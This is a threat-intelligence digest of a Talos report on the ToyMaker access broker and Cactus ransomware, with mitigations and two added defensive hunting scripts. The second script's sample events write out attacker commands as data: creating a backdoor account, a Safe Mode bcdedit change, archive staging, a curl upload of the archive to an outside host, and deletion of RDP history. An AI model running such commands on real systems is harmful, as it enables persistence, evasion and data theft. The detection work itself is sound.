Introducing Toymaker, an Initial Access Broker Working In Cahoots With Double Extortion Gangs
Summary:
In 2023, Cisco Talos uncovered a staged compromise of a critical infrastructure enterprise carried out by two distinct threat actors. Initial access was obtained by a financially motivated actor Talos tracks as ToyMaker, who exploited vulnerable internet-facing systems and deployed a custom backdoor named LAGTOY. The implant gave the operator remote command execution and reverse shells, which ToyMaker used for credential harvesting and persistent access. Within days of the initial foothold, ToyMaker performed basic reconnaissance, created fake administrative accounts, dumped system memory with Magnet RAM Capture to extract credentials, archived the dumps with 7-Zip and exfiltrated them with PuTTY's SCP client (pscp).
After a three-week lull, access was handed to the Cactus ransomware group, marking the transition from access brokering to monetization. Cactus brought its own, clearly different tooling and TTPs for network enumeration, file archiving and data exfiltration, ending in a double extortion attack. The group deployed remote management utilities such as eHorus, AnyDesk, RMS and OpenSSH, and maintained persistence through scheduled tasks and Metasploit-generated binaries that beaconed to actor-controlled infrastructure. Cactus also escalated privileges and took anti-forensic steps, removing SSH keys, clearing logs and modifying file permissions.
LAGTOY, Talos's name for ToyMaker's backdoor, runs as a Windows service named "WmiPrvSV" (a lookalike of the legitimate WmiPrvSE.exe WMI provider host) and talks to a hardcoded command-and-control server over a raw socket on TCP port 443 without TLS, so its traffic occupies the HTTPS port but is not HTTPS. It executes commands received from the C2, including administrative tasks and custom instructions, and uses its own time-based logic to decide how often commands are processed and how long it sleeps between them. Anti-debugging checks are built into the execution logic to hinder dynamic analysis of the sample.
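Two of the LAGTOY traits above are directly huntable in ordinary telemetry: a newly installed service whose name is one character off a legitimate Windows binary, and an outbound session to TCP/443 whose first bytes are not a TLS ClientHello. The script below is an added example, not code from Talos or from the report; the service allowlist, the flat record format and the sample services and flows are constructed for illustration, and the raw bytes in the second flow are an assumed placeholder, not LAGTOY's real protocol.

```python
"""Hunt for LAGTOY-style indicators: a service name imitating a legitimate
Windows binary (WmiPrvSV vs. the real WmiPrvSE) and outbound TCP/443 sessions
that do not open with a TLS ClientHello. Added example with constructed data."""

from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumption: a short, defender-maintained list of legitimate names that an
# implant might imitate (not an exhaustive Windows service inventory).
KNOWN_GOOD_SERVICES = {"wmiprvse", "svchost", "lsass", "spoolsv"}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-character lookalike names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_service(name: str) -> Optional[str]:
    """Return the legitimate name this service name imitates, or None."""
    n = name.lower()
    if n in KNOWN_GOOD_SERVICES:
        return None
    for good in KNOWN_GOOD_SERVICES:
        if edit_distance(n, good) <= 1:
            return good
    return None


def is_tls_client_hello(first_bytes: bytes) -> bool:
    """True if the payload starts with a TLS handshake record (type 0x16,
    version 0x03xx) whose first handshake message is ClientHello (0x01)."""
    return (len(first_bytes) >= 6 and first_bytes[0] == 0x16
            and first_bytes[1] == 0x03 and first_bytes[2] <= 0x04
            and first_bytes[5] == 0x01)


@dataclass
class ServiceInstall:      # e.g. a System log event 7045, flattened
    host: str
    name: str
    image: str


@dataclass
class Flow:                # first payload bytes of an outbound session
    host: str
    dst: str
    dport: int
    first_bytes: bytes


def hunt_lagtoy_indicators(services: List[ServiceInstall],
                           flows: List[Flow]) -> List[Tuple[str, str, str]]:
    """Return (host, finding-kind, detail) tuples for both indicator types."""
    findings = []
    for s in services:
        target = lookalike_service(s.name)
        if target:
            findings.append((s.host, "service-lookalike",
                             f"{s.name} imitates {target} ({s.image})"))
    for f in flows:
        if f.dport == 443 and not is_tls_client_hello(f.first_bytes):
            findings.append((f.host, "plaintext-443",
                             f"{f.dst}:{f.dport} opens with {f.first_bytes[:4].hex()}"))
    return findings


# Constructed sample telemetry (not from the Talos report).
SAMPLE_SERVICES = [
    ServiceInstall("srv01", "WmiPrvSE", r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ServiceInstall("srv01", "WmiPrvSV", r"C:\ProgramData\wmiprvsv.exe"),
]
SAMPLE_FLOWS = [
    # genuine TLS 1.2 ClientHello record header
    Flow("srv01", "203.0.113.10", 443, bytes.fromhex("16030100f5010000f10303")),
    # assumed placeholder for a raw, non-TLS protocol on the HTTPS port
    Flow("srv01", "203.0.113.20", 443, b"ID:srv01;CMD?\n"),
]

if __name__ == "__main__":
    for host, kind, detail in hunt_lagtoy_indicators(SAMPLE_SERVICES, SAMPLE_FLOWS):
        print(f"{host}\t{kind}\t{detail}")
```

The plaintext check will also fire on legitimate non-TLS services that happen to listen on 443 (plain HTTP, some VPN stacks), so pair it with destination reputation or baseline it per host before alerting on it alone; the lookalike check is far lower-noise and is the one to page on.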
Security Officer Comments:
Cactus's use of the access provided by ToyMaker was highly methodical. The group staged sensitive data by compressing it with 7-Zip and uploaded the archives to remote servers with curl. It then covered its tracks by deleting registry keys, clearing RDP connection history and removing its own persistence mechanisms. On several systems Cactus created unauthorized user accounts such as "whiteninja" to enable automated logins and, most likely, ransomware deployment, and it rebooted systems into Safe Mode to get past endpoint protection.
Talos concludes that ToyMaker operates as an Initial Access Broker (IAB): it takes no part in the monetization phase, but its intrusion and credential theft are what make the later extortion possible. The clean handoff of access and the divergence in techniques between ToyMaker and Cactus are the reason Talos models the two as discrete but related entities, and it recommends building such access-handover dynamics into threat models, noting that ToyMaker's tooling and behaviour match the profile of a financially motivated IAB.
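Most of the Cactus actions listed above leave a process-creation record (Security event 4688 or Sysmon event 1) whose command line is distinctive: `net user ... /add`, `bcdedit ... safeboot`, `7z a ...`, `curl -T ...` and `reg delete ... Terminal Server Client`. The rule set below is an added example, not code from Talos or from the report; the flat `ts|host|user|cmdline` format and the sample events are constructed for illustration, and the account name, passwords and hosts in them are invented. Beyond single-rule hits it also links an archive-staging event to a later curl upload on the same host, which is the staging-then-exfiltration sequence described in the summary.

```python
"""Command-line rules for the Cactus tradecraft described above, run over
constructed process-creation records (Security 4688 / Sysmon 1 flattened to
'ts|host|user|cmdline'). Added example, not from the Talos report."""

import re
from collections import defaultdict
from typing import Dict, List, Tuple

# (rule name, regex applied to the full command line)
RULES = [
    ("account-create",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I)),
    ("safeboot-config",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\bsafeboot\b", re.I)),
    ("archive-staging",
     re.compile(r"\b7za?(?:\.exe)?\s+a\b", re.I)),
    ("curl-upload",
     re.compile(r"\bcurl(?:\.exe)?\b.*(?:\s-T\s|--upload-file\b|\s-F\s)", re.I)),
    ("rdp-history-wipe",
     re.compile(r"\breg(?:\.exe)?\s+delete\b.*Terminal Server Client", re.I)),
]


def match_rules(cmdline: str) -> List[str]:
    """Names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed 'ts|host|user|cmdline' record (cmdline may contain '|')."""
    ts, host, user, cmd = line.split("|", 3)
    return {"ts": ts, "host": host, "user": user, "cmd": cmd}


def hunt_cactus_commands(lines: List[str]) -> Tuple[Dict[str, List[Tuple[str, str, str]]], List[str]]:
    """Return ({host: [(ts, user, rule), ...]}, [hosts where an archive-staging
    hit is followed in time by a curl-upload hit])."""
    hits: Dict[str, List[Tuple[str, str, str]]] = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        for rule in match_rules(ev["cmd"]):
            hits[ev["host"]].append((ev["ts"], ev["user"], rule))
    staged_then_uploaded = []
    for host, evs in hits.items():
        ordered = [rule for _, _, rule in sorted(evs)]   # ISO timestamps sort lexically
        if "archive-staging" in ordered:
            after = ordered[ordered.index("archive-staging"):]
            if "curl-upload" in after:
                staged_then_uploaded.append(host)
    return dict(hits), staged_then_uploaded


# Constructed sample events (hosts, accounts and paths are invented).
SAMPLE_EVENTS = [
    r"2024-03-02T01:10:05|srv02|SYSTEM|net user whiteninja P@ss123 /add",
    r"2024-03-02T01:11:40|srv02|SYSTEM|bcdedit /set {default} safeboot network",
    r"2024-03-02T02:05:11|fs01|admin|7z.exe a -pSecret C:\staging\hr.7z \\fs01\share\HR",
    r"2024-03-02T02:20:44|fs01|admin|curl.exe -T C:\staging\hr.7z https://198.51.100.7/up",
    r'2024-03-02T02:30:00|fs01|admin|reg delete "HKCU\Software\Microsoft\Terminal Server Client\Default" /va /f',
    r"2024-03-02T09:00:00|ws05|jdoe|curl.exe https://example.com/",   # benign download
]

if __name__ == "__main__":
    hits, sequences = hunt_cactus_commands(SAMPLE_EVENTS)
    for host, evs in hits.items():
        for ts, user, rule in evs:
            print(f"{ts}\t{host}\t{user}\t{rule}")
    print("staging followed by upload on:", sequences)
```

The benign `curl` download on ws05 is deliberately left unflagged: the rule keys on upload switches rather than on the binary itself, which is the difference between a usable detection and the blanket "block curl" advice that rarely survives contact with production.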
Suggested Corrections:
- Secure Authentication: Enforce multi-factor authentication (MFA) on all remote access and privileged accounts. Audit accounts regularly, alert on newly created local administrators, and disable unused or stale accounts.
- Restrict Dual-Use Tools: Use application control to limit remote-management software (AnyDesk, eHorus, RMS) to approved, signed builds, and alert on archiving and transfer utilities (7-Zip, curl, pscp) when they run from unusual paths, under service accounts, or with upload arguments. Blanket blocking of PowerShell is rarely practical; constrain and log it instead.
- Patch & Harden External Assets: Patch internet-facing systems promptly and scan regularly for exposed or vulnerable assets, since ToyMaker's initial access came from exploiting such systems.
- Enhance Detection Capabilities: Use EDR and log analytics to detect credential theft (memory dumping), lateral movement, persistence (new services and scheduled tasks), and defense-evasion steps such as Safe Mode reboots (bcdedit safeboot) or shadow copy deletion.
Link(s):
https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/